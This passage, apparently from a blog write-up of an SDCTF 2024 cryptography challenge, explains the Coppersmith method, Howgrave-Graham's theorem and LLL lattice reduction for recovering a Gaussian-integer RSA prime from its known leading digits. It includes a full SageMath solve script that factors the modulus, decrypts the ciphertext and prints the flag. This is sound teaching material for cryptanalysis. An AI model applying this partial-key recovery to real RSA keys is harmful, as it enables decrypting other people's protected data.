about 85 and 87 of these digits respectively. (Okay, maybe it wasn’t two-thirds…)</p>

<p>Retrieving these missing bits seems hard. Let’s consider a simpler problem: What if this was regular RSA and we had
about 60% of p. As it turns out, someone has solved this problem before.</p>

<h2 id="a-copper-sword-crafted-by-the-kingdoms-finest-blacksmith">A Copper sword crafted by the kingdom’s finest blackSmith</h2>

<p>Enter the Coppersmith method. In a nutshell, the method finds small integer roots of polynomials modulo a given integer.
To clarify, this means that if we have a polynomial of the form $F(x) = x^n + a_{n-1}x^{n-1} + … + a_1x + a_0$ where
$a_i \in \mathbb{Z \text{ (mod N)}}$,  and we know that there exists some integer $x_0$ such that $F(x_0) \equiv 0
\text{ (mod N)}$ and $|x_0|$ is less than $N^{\frac{1}{n}}$, we can find $x_0$.</p>

<p>You might be wondering, “cool fact. What does this have to do with us?” The answer is <em>everything</em>. Let me take you
through this step-by-step.</p>

<ol>
  <li>Recall that we have knowledge of <code class="language-plaintext highlighter-rouge">N</code>, the fact that <code class="language-plaintext highlighter-rouge">N = p * q</code>, and a fair chunk of <code class="language-plaintext highlighter-rouge">p</code> (let’s say about
 110 digits of 155 digits).</li>
  <li>We can express <code class="language-plaintext highlighter-rouge">p</code> as follows <code class="language-plaintext highlighter-rouge">p = the_known_part + the_unknown_part</code>. Mathematically, $p = a + r$
  where a and r are the known and unknown parts of p respectively.
    <ul>
      <li>For example if <code class="language-plaintext highlighter-rouge">p = 382xx</code>, we would express it as $p = 38200 + r$.</li>
    </ul>
  </li>
  <li>We also have that $r$ is less than $10^{45}$ since $r$ has 45 digits. Thus, we get an upper bound $R = 10^{45}$.</li>
  <li>Let’s create a polynomial $f(x)$ modulo $p$. We will define $f(x) = a + x$ where $a$ is a constant which represents
 the known part of $p$.
    <ul>
      <li>In the definition of the method above, $n = 1$ (aka the degree of the polynomial we must solve)</li>
    </ul>
  </li>
  <li>Now, $f(r) = a + r = p \equiv 0 \text{ (mod p)}$. In other words, $r$ is our small ineger root $x_0$ from the
definition above.</li>
  <li>Note, that $r$ is less than $R$ which is less than $p^{\frac{1}{1}} = p^1$ which is less than $N$.</li>
  <li>YAY! This is literally what the Coppersmith method needs to work.</li>
</ol>

<p><img src="https://media1.tenor.com/m/sqYV7D2euF8AAAAC/kronk-oh-yeah-its-all-coming-together.gif" alt="oh yeah, it's all coming together" /></p>

<h2 id="the-coppersmith-attack-is-truly-one-of-the-attacks-of-all-time">The Coppersmith Attack is truly one of the attacks of all time</h2>

<p>Now that we have the pieces, let’s apply the coppersmith method to find our $x_0$ ($r$). Firstly, it’s good to
understand a bit of our motivation here. It is very difficult to find the roots of an integer polynomial over some
modulo N. However, it is extremely trivial (relatively) to find the roots of the same polynomial over the integers. The
method takes in our polynomial $f(x)$ performs a bit of magic and in combination with the Howgrave-Graham theorem it
converts our polynomial modulo N to a simple polynomial with the same small roots over the integers (no modulo).</p>

<h3 id="the-howgrave-graham-theorem">The Howgrave-Graham Theorem</h3>
<p>Okay, so the (extremely abridged version of) Howgrave-Graham Theorem states that for a polynomial $g(x)$, if:</p>
<ul>
  <li>$g(x_0) \equiv 0 \text{ (mod }b^k\text{)}$ for some $b, k$</li>
  <li>$abs(x_0) \le R$ Where R is the upper bound we discussed earlier</li>
  <li>The length of the coefficient vector of $g(R \cdot x)$ is small. (The coefficient vector refers to the vector containing the
  coefficients of each term in our polynomial $[a_n, a_{n-1}, …, a_1, a_0]$.)
    <ul>
      <li>Small is once again defined as being less than some bound based on $b, k$ and the degree of $g(x)$. However, it’s
  not relevant to us because we will fulfill it at the end. (Haha! this might be forshadowing)</li>
    </ul>
  </li>
</ul>

<p>then $g(x_0) = 0$ over the integers too. That is, $x_0$ is an integer root.</p>

<p>Great! let’s use this on $f(x)$. Well… we can’t use it just yet because the coefficients of the polynomial $f(R\cdot x)$ are
<strong>huge</strong>. In particular, the constant term $a$ is the same number of digits of $p$. This fails the third condition in
the Howgrave-Graham theorem which wants a small coefficient vector. Fortunately, there’s a way to fix this.</p>

<h3 id="reducing-the-size-of-our-massive-polynomials">Reducing the Size of our Massive Polynomials</h3>

<p>At first glance, it seems difficult to do reduce the size of our coefficients. However, all we need is a small cameo
from our good old friend: linear combinations.</p>

<p>Suppose I had two polynomials $a(x)$ and $b(x)$ such that $a(x_0) \equiv b(x_0) \equiv 0 \text{ (mod m)}$ for some
integers $m$ and $x_0$. Note that $a(x_0)$ doesn’t neccessarily equal $b(x_0)$. Now, we have that $a(x_0) + b(x_0)
\equiv 0 \text{ (mod m)}$. Trivially, we also have that $l \cdot a(x_0) \equiv 0 \text{ mod(m)}$ for any integer $l$.
Thus, for any integers $l$ and $k$, we get $l \cdot a(x_0) + k \cdot b(x_0) \equiv 0 \text{ mod(m)}$. So</p>

<p>In summary, we just showed that any <em>integer</em> linear combination of two polynomials preserves (or has the same) the root
$x_0$ over our modulus $m$. 
So, this means that if we can find other polynomials which has the same root, x_0, as $f(Rx)$ (and $f(x)$) modulo $p$, then we can
craft an integer linear combination between them to reduce the size of our coefficients. (Note: this is similar to the
idea of row reductions in matrix algebra).</p>

<h3 id="a-trick-to-create-unlimited-polynomials">A Trick to Create Unlimited Polynomials</h3>

<p>Our long chain of dominos continues as we search for polynomials with the same root $x_0$ as $f(x)$ over our modulus p.
For convenience, I will call this set of polynomials $F$. The problem is we don’t know $p$, so we can’t make polynomials
like $g(x) = px^2 + 4px + p^3$ which will always be 0 for all values of $x$. (They’re not particularly useful either).
Let’s use some clever tricks instead.</p>

<ul>
  <li>Firstly, we know $N$ which is a multiple of $p$ so $g(x) = N \equiv 0 \text{ (mod p)}$ for all $x$ including $x_0$.
  Let’s add it to $F$.</li>
  <li>Next, we have that $f(x_0) \equiv 0 \text{ (mod p)}$. We could square both sides and get: $[f(x_0)]^2 \equiv 0 \text{
  (mod p)}. Nice! Let’s add $[f(Rx)]^2$ to $F$.</li>
  <li>Why stop there? We can just continue raising $f(Rx)$ to various ineger powers and have the same outcome as above. We
  can thus add all the powers of $f(Rx)$ to $F$.</li>
</ul>

<p>Now, we have a long list of polynomials to choose from. An alternative to this method would be to simply multiply $f(Rx)$
by different powers of $x$. However, the downside to this method is that we would lose our constant term in the elements
of $F$. The powers of $f(Rx)$ is much more elegant in the sense that due to the binomial theorem, we are bound to have
constant terms.</p>

<h3 id="the-magical-mysteries-of-the-lattice-and-lll">The Magical Mysteries of the Lattice and LLL</h3>

<p>We have a list of polynomials with the same root $x_0$ whose coefficients we seek to reduce through their integer linear
combinations. It remains to be asked: “How do we determine the most efficient integer linear combinations”. It’s time to
introduce Lattices and LLL.</p>

<hr />
<h3 id="introducing-our-new-show-decomplexify-this">Introducing our New Show: DeComplexify This!</h3>

<p>Today, we will be learning what a Lattice and how LLL might help our little predicament. Recall that if we were working
with the Real numbers, we could simply use a matrix to reduce the size of a basis and make it orthogonal using the
gram schmidt method. However, we are working over the Integers where the same strategy cannot be used.</p>

<p>Introducing the Lattice. No, not the lattice from Organic Chemistry. An n x n (integer) lattice is essenitally just like a
n x n matrix with two exceptions:</p>
<ul>
  <li>All the elemwents in our lattice are integers</li>
  <li>The Span of our vectors refers to just the <em>integer</em> linear combinations. (Instead of real coefficients for matrices).</li>
</ul>

<p>To clarify: We will exclusively be talking about integer lattices, hereby referred to as just lattices.</p>

<p>Like a matrix, we can put express our polynomial f(Rx) in the form of a row vector. In fact, you’ve already seen this
before in the form of our coefficient vectors.</p>

<p><img src="/assets/images/sdctf-2024/reallycomplexproblem/coefficient_vec.png" alt="" /></p>

<p>We can create a matrix using some of our polynomials in $F$ where each row is a polynomial and each column is represents
the coefficients of a power of $x$. We can create a matrix using the polynomials $g(x) = N$, $f(Rx)$, $[f(Rx)]^2$.</p>

<p><img src="/assets/images/sdctf-2024/reallycomplexproblem/3x3_lattice.png" alt="" /></p>

<p>Now that we have constructed our lattice, let me introduce the LLL algorithm (Lenstra-Lenstra-Lovász). I won’t be going
over the nitty-gritty details of this algorithm and will instead treat this as a black box. This algorithm takes in a
lattice basis (Basis has the same meaning as in matrix algebra) and outputs a lattice with a more orthogonal and smaller
basis. You can read about it more in this wonderful <a href="https://eprint.iacr.org/2023/032.pdf">tutorial</a>. A fun exercise is
justifying to yourself that our row vectors are linearly independent to each other.</p>

<hr />

<p>Once we apply the LLL algorithm on this lattice, our rows, representing polynomials, will now have smaller coefficients.
Since the length of our coefficient vector is smaller (by definition of LLL), we can apply Howgrave-Graham’s theorem in
order to find $x_0$ by finding the roots of $h(x)$ over the integers. Note that the resulting row vectors will be of the
form $h(Rx)$. We simply divide each coefficient by $R$ to retrieve $h(x)$.</p>

<p>We have succesfully found $r$ (our $x_0$) and we can reconstruct $p$ by $a + r$. Victory! We solved our simpler RSA
problem. Now, to deal with something more complex. (literally)</p>

<h2 id="the-complexities-of-complex-numbers">The Complexities of Complex Numbers</h2>

<p>The question now is: “Can we do the same for our complex integers?” The answer is <strong><em>mostly</em></strong>. While most of the
theorems extends out to the Complex Integers, LLL only operates over the regular integers. To understand how we overcome
this problem, let’s first go through our solution till our roadblock.</p>

<ol>
  <li>Write down <code class="language-plaintext highlighter-rouge">N</code> and the known part of <code class="language-plaintext highlighter-rouge">p</code>
    <div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">N</span> <span class="o">=</span> <span class="o">-</span><span class="mi">117299665605343495500066013555546076891571528636736883265983243281045565874069282036132569271343532425435403925990694272204217691971976685920273893973797616802516331406709922157786766589075886459162920695874603236839806916925542657466542953678792969287219257233403203242858179791740250326198622797423733569670</span> <span class="o">+</span> <span class="mi">617172569155876114160249979318183957086418478036314203819815011219450427773053947820677575617572314219592171759604357329173777288097332855501264419608220917546700717670558690359302077360008042395300149918398522094125315589513372914540059665197629643888216132356902179279651187843326175381385350379751159740993</span><span class="o">*</span><span class="n">I</span>
<span class="n">a</span> <span class="o">=</span> <span class="mi">1671911043329305519973004484847472037065973037107329742284724545409541682312778072234</span> <span class="o">*</span> <span class="mi">10</span><span class="o">^</span><span class="mi">70</span> <span class="o">+</span> <span class="mi">193097758392744599866999513352336709963617764800771451559221624428090414152709219472155</span> <span class="o">*</span> <span class="mi">10</span><span class="o">^</span><span class="mi">68</span> <span class="o">*</span> <span class="n">I</span>
</code></pre></div>    </div>
  </li>
  <li>At the same time as finding <code class="language-plaintext highlighter-rouge">a</code>, we can define our upper bound $R$ as $R_r$ and $R_i$ for the bound of the real and
imaginary part of <code class="language-plaintext highlighter-rouge">r</code>. Since the primes will always have about 155 digits (this could be verified with a bit of
testing/bruteforcing other limits).</li>
  <li>Our $f(x) = a + x$. Instead of this, we can choose to be more verbose and write it as $a + bi + x + i \cdot x$. Here,
we treat $i$ similar to a variable and all the coefficients (like $a$ and $b$) are real integers.</li>
  <li>We do the same process as before to generate different powers of $f((R_r + R_i \cdot i)x)$ modulo p. (refer to the
challenge code to see how you can take the modulo under a complex number)</li>
  <li>Now, we hit our roadblock of representing our polynomials as row vectors of integers. Well, we could simply double
the columns (adding an imaginary part to each power of $x$). This looks like…
<img src="/assets/images/sdctf-2024/reallycomplexproblem/imaginary_vec.png" alt="" />
    <ul>
      <li>one more note is that we can double our set from before by adding the imaginary multipe of $f$ such as $-i\cdot f(Rx)$</li>
    </ul>
  </li>
  <li>Construct a matrix with a lot of these row vectors and perform LLL.
    <ul>
      <li>The reason we need a lot of polynomials has to do with the Howgrave-Graham theorem which essenitally ends up
  equating to us requiring more rows to have a greater chance of finding our root.</li>
    </ul>
  </li>
  <li>find the root of the reduced polynomial over the Complex Integers.</li>
  <li>Retrieve <code class="language-plaintext highlighter-rouge">r</code> and thus find $p$</li>
  <li>Use $p$ to find $q$ and then find $d$ and use $d$ to decrypt our ciphertext given by:
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>e = 65537
ciphertext = 49273345737246996726590603353583355178086800698760969592130868354337851978351471620667942269644899697191123465795949428583500297970396171368191380368221413824213319974264518589870025675552877945771766939806196622646891697942424667182133501533291103995066016684839583945343041150542055544031158418413191646229 - 258624816670939796343917171898007336047104253546023541021805133600172647188279270782668737543819875707355397458629869509819636079018227591566061982865881273727207354775997401017597055968919568730868113094991808052722711447543117755613371129719806669399182197476597667418343491111520020195254569779326204447367 * I
</code></pre></div>    </div>
  </li>
</ol>

<p>Wow, we did it! oh no… It did not work :(</p>

<h2 id="why-doesnt-it-work">WHY DOESNT IT WORK!!</h2>

<p>The short answer is that we need to modify our choice of polynomials because it still fails the conditions for the
Howgrave-Graham Theorem. Recall that the Howgrave theorem limits us on our choices of $b$, $k$, and the degree of the
polynomial. For the theorem, we need $f(x_0) \equiv 0 \text{ (mod }b^k\text{)}$. Previously, we just set $b^k = p$ and
called it a day. However. However, through a long series of proofs that are very well highlighted on this <a href="https://www.klwu.co/maths-in-crypto/lattice-2/#howgrave-grahams-formulation">blog</a>, 
this can be very inefficient and makes it such that the maximum upper bound for $R$ ends up being very small. The
maximum bound is usually defined by some relation $X \approx N^\frac{1}{c(d)}$ where $c(d)$ is a function that depends
on the degree, $d$, of our polynomial. Understanding this, our goal would be to reduce the the growth of $c(d)$ as much
as possible. We will be using two techniques to do this (from the same blog post).</p>

<hr />
<h3 id="the-first-technique">The First Technique:</h3>

<p>Rather than considering $b^k = p$, we could instead try $b = p$. This would ultimately help increase our upper bound (as
described in the blog if you are curious). What changes? Well, unfortunately $f(x_0) \equiv 0 \text{ (mod }p^k\text{)}$
is no longer true. However, this might actually be useful.</p>

<p>I will leave this as an exercise to the curious readers, but it’s trivial to observe that if an integer $a$ divides $b$,
then $a^k$ divides $b^k$. Also, if $a$ divides $c$, then $a^k$ divides $c^{i}b^{k - i}$ for some $i \in \mathbb{Z}$ that
is less than $K$ and greater than zero. This implies that if we have two polynomials $a(x)$ and $b(x)$ such that $a(x_0)
\equiv b(x_0) \equiv 0 \text{ (mod m)}$ for some integer $m$, then $[a(x_0)]^i[b(x_0)]^{k - i} \equiv 0 \text{ (mod
}m^k\text{)}$.</p>

<p>So, let’s use the two polynomials we know are divisible by $p$ at $x_0$: $N$ and $f(Rx)$. (yes, N is a polynomial that
equates to a constant.) Now, instead of using powers of $f(x)$, we can instead add polynomials of the form
$[f(Rx)]^i[N]^{k - i}$ for each integer $i \in [0, k - 1]$ to our set $F$.</p>

<p>Note that for our complex integers, whenever I add a polynomial $g(x)$ to $F$, I’m also adding its imaginary multiple
$-i\cdot g(x)$ to the set. This simply helps with the lattice reduction by giving the LLL algorithm more options to
reduce our polynomials by.</p>

<h3 id="technique-numero-dos">Technique Numero Dos:</h3>

<p>The second technique, which was discussed directly in the blog, involves multiplying $[f(Rx)]^k$ with various powers of
$x$. Recall that $[f(x_0)]^k \equiv 0 \text{ (mod }p^k\text{)}$.So, we add polynomials of the form $[N]^i[f(Rx)]^k $ for
each integer $i \in [0, k - 1]$ to our set $F$ (along with its imaginary multiples. Note that there’s nothing really
stopping us from taking a different number of polynomials for the second technique, rather than $k - 1$ polynomials we
can take $5$ or $4000$. Though I’m not sure what those bounds would be.</p>

<hr />

<h2 id="back-to-business">Back to business</h2>

<p>Now that we have created a better lattice, we can finally solve our challenge. Nevermind! There’s a lot of sage-specific
bugs that had to be squashed.</p>

<p><em>hours later</em>, we can finally use our script to reverse the encryption and encoding to get our flag.</p>

<h2 id="the-solve-script-finally">The solve script (finally)</h2>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="kn">from</span> <span class="nn">CRSA</span> <span class="kn">import</span> <span class="n">GaussianRational</span><span class="p">,</span> <span class="n">decrypt</span>
<span class="kn">from</span> <span class="nn">fractions</span> <span class="kn">import</span> <span class="n">Fraction</span>
<span class="kn">from</span> <span class="nn">Crypto.Util.number</span> <span class="kn">import</span> <span class="n">long_to_bytes</span>

<span class="n">ciphertext</span> <span class="o">=</span> <span class="mi">49273345737246996726590603353583355178086800698760969592130868354337851978351471620667942269644899697191123465795949428583500297970396171368191380368221413824213319974264518589870025675552877945771766939806196622646891697942424667182133501533291103995066016684839583945343041150542055544031158418413191646229</span> <span class="o">-</span> <span class="mi">258624816670939796343917171898007336047104253546023541021805133600172647188279270782668737543819875707355397458629869509819636079018227591566061982865881273727207354775997401017597055968919568730868113094991808052722711447543117755613371129719806669399182197476597667418343491111520020195254569779326204447367</span> <span class="o">*</span> <span class="n">I</span>
<span class="n">N</span> <span class="o">=</span> <span class="o">-</span><span class="mi">117299665605343495500066013555546076891571528636736883265983243281045565874069282036132569271343532425435403925990694272204217691971976685920273893973797616802516331406709922157786766589075886459162920695874603236839806916925542657466542953678792969287219257233403203242858179791740250326198622797423733569670</span> <span class="o">+</span> <span class="mi">617172569155876114160249979318183957086418478036314203819815011219450427773053947820677575617572314219592171759604357329173777288097332855501264419608220917546700717670558690359302077360008042395300149918398522094125315589513372914540059665197629643888216132356902179279651187843326175381385350379751159740993</span><span class="o">*</span><span class="n">I</span>
<span class="n">a</span> <span class="o">=</span> <span class="mi">1671911043329305519973004484847472037065973037107329742284724545409541682312778072234</span> <span class="o">*</span> <span class="mi">10</span><span class="o">^</span><span class="mi">70</span> <span class="o">+</span> <span class="mi">193097758392744599866999513352336709963617764800771451559221624428090414152709219472155</span> <span class="o">*</span> <span class="mi">10</span><span class="o">^</span><span class="mi">68</span> <span class="o">*</span> <span class="n">I</span>


<span class="c1"># This function takes in our polynomial and returns two rows
# The first row is the coefficient vector, scaled by the uppper bounds, of the regular polynomial 
# The second row is the coefficient vector, scaled by the upper bounds, of its imaginary multiple
</span><span class="k">def</span> <span class="nf">get_coefficients</span><span class="p">(</span><span class="n">f</span><span class="p">,</span> <span class="n">R_r</span><span class="p">,</span> <span class="n">R_i</span><span class="p">):</span>
     <span class="n">regular</span> <span class="o">=</span> <span class="p">[]</span>
     <span class="n">imag_multiple</span> <span class="o">=</span> <span class="p">[]</span>
     <span class="n">coeffs</span> <span class="o">=</span> <span class="n">f</span><span class="p">.</span><span class="nb">list</span><span class="p">()</span>

     <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">c</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">coeffs</span><span class="p">):</span>
         <span class="n">regular</span><span class="p">.</span><span class="n">extend</span><span class="p">([</span><span class="n">c</span><span class="p">.</span><span class="n">real</span><span class="p">()</span> <span class="o">*</span> <span class="n">R_r</span><span class="o">^</span><span class="n">i</span><span class="p">,</span> <span class="n">c</span><span class="p">.</span><span class="n">imag</span><span class="p">()</span> <span class="o">*</span> <span class="n">R_i</span><span class="o">^</span><span class="n">i</span><span class="p">])</span>

     <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">c</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">coeffs</span><span class="p">):</span>
         <span class="n">imag_multiple</span><span class="p">.</span><span class="n">extend</span><span class="p">([</span><span class="o">-</span><span class="mi">1</span> <span class="o">*</span> <span class="n">c</span><span class="p">.</span><span class="n">imag</span><span class="p">()</span> <span class="o">*</span> <span class="n">R_r</span><span class="o">^</span><span class="n">i</span><span class="p">,</span> <span class="n">c</span><span class="p">.</span><span class="n">real</span><span class="p">()</span> <span class="o">*</span> <span class="n">R_i</span><span class="o">^</span><span class="n">i</span><span class="p">])</span>

     <span class="k">return</span> <span class="p">[</span><span class="n">regular</span><span class="p">,</span> <span class="n">imag_multiple</span><span class="p">]</span>

<span class="c1"># since our row vectors have different lengths, we need to pad them with zeros
# Note that the solve script reverses the columns. The leftmost column is the constant while
# the rightmost column is the coefficient of the highest degree of x
</span><span class="k">def</span> <span class="nf">rpad</span><span class="p">(</span><span class="n">lst</span><span class="p">,</span> <span class="n">length</span><span class="p">):</span>
    <span class="n">result</span> <span class="o">=</span> <span class="p">[]</span>
    <span class="k">for</span> <span class="n">l</span> <span class="ow">in</span> <span class="n">lst</span><span class="p">:</span>
        <span class="n">result</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">l</span> <span class="o">+</span> <span class="p">[</span><span class="mi">0</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">length</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="n">l</span><span class="p">))])</span>
    <span class="k">return</span> <span class="n">result</span>


<span class="k">def</span> <span class="nf">coppersmith</span><span class="p">(</span><span class="n">f</span><span class="p">,</span> <span class="n">R_r</span><span class="p">,</span> <span class="n">R_i</span><span class="p">,</span> <span class="n">N</span><span class="p">,</span>  <span class="n">k</span><span class="p">):</span>
    <span class="c1"># This was the maximum number of columns/entries a row vector has.
</span>    <span class="n">max_cols</span> <span class="o">=</span> <span class="mi">4</span> <span class="o">*</span> <span class="n">k</span>
    <span class="c1"># polynomial row vectors
</span>    <span class="n">polynomial_rows</span> <span class="o">=</span> <span class="p">[]</span>
    <span class="n">x</span> <span class="o">=</span> <span class="n">f</span><span class="p">.</span><span class="n">parent</span><span class="p">().</span><span class="n">gen</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="c1"># apparently helps sage do its thing
</span>
    <span class="c1"># Add polynomials from our first technique
</span>    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">k</span><span class="p">):</span>
        <span class="n">poly_rows</span> <span class="o">=</span> <span class="n">get_coefficients</span><span class="p">(</span><span class="n">f</span><span class="o">^</span><span class="n">i</span> <span class="o">*</span> <span class="n">N</span><span class="o">^</span><span class="p">(</span><span class="n">k</span><span class="o">-</span><span class="n">i</span><span class="p">),</span> <span class="n">R_r</span><span class="p">,</span> <span class="n">R_i</span><span class="p">)</span>
        <span class="n">poly_rows</span> <span class="o">=</span> <span class="n">rpad</span><span class="p">(</span><span class="n">poly_rows</span><span class="p">,</span> <span class="n">max_cols</span><span class="p">)</span>
        <span class="n">polynomial_rows</span><span class="p">.</span><span class="n">extend</span><span class="p">(</span><span class="n">poly_rows</span><span class="p">)</span>

    <span class="c1"># Add polynomials from our second technique
</span>    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">k</span><span class="p">):</span>
        <span class="n">poly_rows</span> <span class="o">=</span> <span class="n">get_coefficients</span><span class="p">(</span><span class="n">f</span><span class="o">^</span><span class="n">k</span> <span class="o">*</span> <span class="n">x</span><span class="o">^</span><span class="n">i</span><span class="p">,</span> <span class="n">R_r</span><span class="p">,</span> <span class="n">R_i</span><span class="p">)</span> 
        <span class="n">poly_rows</span> <span class="o">=</span> <span class="n">rpad</span><span class="p">(</span><span class="n">poly_rows</span><span class="p">,</span> <span class="n">max_cols</span><span class="p">)</span>
        <span class="n">polynomial_rows</span><span class="p">.</span><span class="n">extend</span><span class="p">(</span><span class="n">poly_rows</span><span class="p">)</span>
    
    <span class="c1"># We perform LLL on our lattice
</span>    <span class="n">M</span> <span class="o">=</span> <span class="n">matrix</span><span class="p">(</span><span class="n">polynomial_rows</span><span class="p">)</span>
    <span class="n">B</span> <span class="o">=</span> <span class="n">M</span><span class="p">.</span><span class="n">LLL</span><span class="p">()</span>

    <span class="c1"># v is the first polynomial from our reduced lattice
</span>    <span class="n">v</span> <span class="o">=</span> <span class="n">B</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> 
    
    <span class="c1"># This section was lifted from the official solve, but just cleans up our polynomial
</span>    <span class="n">Q</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="k">for</span> <span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">i</span><span class="p">)</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="nb">list</span><span class="p">(</span><span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">v</span><span class="p">),</span> <span class="mi">2</span><span class="p">))):</span>
        <span class="n">z</span> <span class="o">=</span> <span class="n">v</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">/</span> <span class="p">(</span><span class="n">R_r</span><span class="o">^</span><span class="n">s</span><span class="p">)</span> <span class="o">+</span> <span class="n">v</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">]</span> <span class="o">/</span> <span class="p">(</span><span class="n">R_i</span><span class="o">^</span><span class="n">s</span><span class="p">)</span> <span class="o">*</span> <span class="n">I</span>
        <span class="n">Q</span> <span class="o">+=</span> <span class="n">z</span> <span class="o">*</span> <span class="n">x</span><span class="o">^</span><span class="n">s</span>

    <span class="k">return</span> <span class="n">Q</span>

<span class="n">R</span><span class="p">.</span><span class="o">&lt;</span><span class="n">x</span><span class="o">&gt;</span> <span class="o">=</span> <span class="n">PolynomialRing</span><span class="p">(</span><span class="n">I</span><span class="p">.</span><span class="n">parent</span><span class="p">(),</span> <span class="s">"x"</span><span class="p">)</span> <span class="c1"># sage once again doing its thing
</span><span class="n">f</span> <span class="o">=</span> <span class="n">x</span> <span class="o">+</span> <span class="n">a</span> <span class="c1"># our beloved polynomial
</span>
<span class="c1"># 10 seemed to be the sweet spot
</span><span class="n">Q</span> <span class="o">=</span> <span class="n">coppersmith</span><span class="p">(</span><span class="n">f</span><span class="p">,</span> <span class="mi">10</span><span class="o">^</span><span class="mi">70</span><span class="p">,</span> <span class="mi">10</span><span class="o">^</span><span class="mi">68</span><span class="p">,</span> <span class="n">N</span><span class="p">,</span> <span class="n">k</span><span class="o">=</span><span class="mi">10</span><span class="p">)</span>

<span class="c1"># r = x_0 = Q.roots()[0][0]
</span><span class="n">p</span> <span class="o">=</span> <span class="n">a</span> <span class="o">+</span> <span class="n">Q</span><span class="p">.</span><span class="n">roots</span><span class="p">()[</span><span class="mi">0</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span>


<span class="c1"># Now we cast the values we calculated to GaussianRationals and find q
</span><span class="n">p</span> <span class="o">=</span> <span class="n">GaussianRational</span><span class="p">(</span><span class="n">Fraction</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">p</span><span class="p">.</span><span class="n">real</span><span class="p">())),</span> <span class="n">Fraction</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">p</span><span class="p">.</span><span class="n">imag</span><span class="p">())))</span>
<span class="n">N</span> <span class="o">=</span> <span class="n">GaussianRational</span><span class="p">(</span><span class="n">Fraction</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">N</span><span class="p">.</span><span class="n">real</span><span class="p">())),</span> <span class="n">Fraction</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">N</span><span class="p">.</span><span class="n">imag</span><span class="p">())))</span>
<span class="n">ciphertext</span> <span class="o">=</span> <span class="n">GaussianRational</span><span class="p">(</span><span class="n">Fraction</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">.</span><span class="n">real</span><span class="p">())),</span> <span class="n">Fraction</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">.</span><span class="n">imag</span><span class="p">())))</span>
<span class="n">q</span> <span class="o">=</span> <span class="n">N</span> <span class="o">/</span> <span class="n">p</span>

<span class="c1"># calculate the value of d from p and q
</span><span class="n">p_norm</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">p</span><span class="p">.</span><span class="n">real</span><span class="o">*</span><span class="n">p</span><span class="p">.</span><span class="n">real</span> <span class="o">+</span> <span class="n">p</span><span class="p">.</span><span class="n">imag</span><span class="o">*</span><span class="n">p</span><span class="p">.</span><span class="n">imag</span><span class="p">)</span>
<span class="n">q_norm</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">q</span><span class="p">.</span><span class="n">real</span><span class="o">*</span><span class="n">q</span><span class="p">.</span><span class="n">real</span> <span class="o">+</span> <span class="n">q</span><span class="p">.</span><span class="n">imag</span><span class="o">*</span><span class="n">q</span><span class="p">.</span><span class="n">imag</span><span class="p">)</span>
<span class="n">tot</span> <span class="o">=</span> <span class="p">(</span><span class="n">p_norm</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="p">(</span><span class="n">q_norm</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span>
<span class="n">e</span> <span class="o">=</span> <span class="mi">65537</span>
<span class="n">d</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="n">e</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="n">tot</span><span class="p">)</span>

<span class="c1"># decrypt our ciphertext 
</span><span class="n">m</span> <span class="o">=</span> <span class="n">decrypt</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">,</span> <span class="p">(</span><span class="n">N</span><span class="p">,</span> <span class="n">d</span><span class="p">))</span>

<span class="c1"># decode the message
</span><span class="k">print</span><span class="p">(</span><span class="n">long_to_bytes</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">m</span><span class="p">.</span><span class="n">real</span><span class="p">))</span> <span class="o">+</span> <span class="n">long_to_bytes</span><span class="p">(</span><span class="nb">int</span><span class="p">((</span><span class="n">m</span><span class="p">.</span><span class="n">imag</span><span class="p">))))</span>

</code></pre></div></div>

<h2 id="flage">Flage</h2>

<p><code class="language-plaintext highlighter-rouge">SDCTF{lll_15_k1ng_45879340409310}</code> Indeed it is king.</p>

<h2 id="final-thoughts">Final Thoughts</h2>

<p>This was a really hard challenge. I spent over 30 hours straight running in circles with various techniques like complex
LLL and Algebraic LLL. However, I did not solve this challenge at the end of the CTF. In fact, this challenge went
unsolved by anyone. After discussing with the author, I realized that one of my earlier ideas of converting the complex
integers to a real matrix to do LLL was actually the intended solution. However, I didn’t quite understand how to
complete the solve path which was doing a canonical embedding. An embedding is similar to what we did with using
